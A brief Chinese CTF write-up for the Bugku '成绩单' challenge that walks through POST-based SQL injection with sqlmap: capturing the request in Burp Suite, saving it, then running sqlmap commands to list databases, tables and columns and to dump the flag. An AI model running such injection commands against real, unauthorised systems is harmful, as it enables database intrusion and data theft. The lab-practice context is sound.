sqlmap-post型 bugku 成绩单

手工注入的话就是常规了,不写了

记录第一次用sqlmap进行post注入

第一步,用bp拦截

sqlmap-post型 bugku 成绩单

 然后选择Copy to file,保存为txt格式

我这里保存为a.txt

sqlmap-post型 bugku 成绩单

python sqlmap.py -r C:\Users\ASUS\Desktop\a.txt --dbs

爆数据库

然后爆表

python sqlmap.py -r C:\Users\ASUS\Desktop\a.txt --tables

爆列

python sqlmap.py -r C:\Users\ASUS\Desktop\a.txt --columns

爆字段

python sqlmap.py -r C:\Users\ASUS\Desktop\a.txt -D skctf_flag -T fl4g -C "skctf_flag" --dump

sqlmap-post型 bugku 成绩单

 完成任务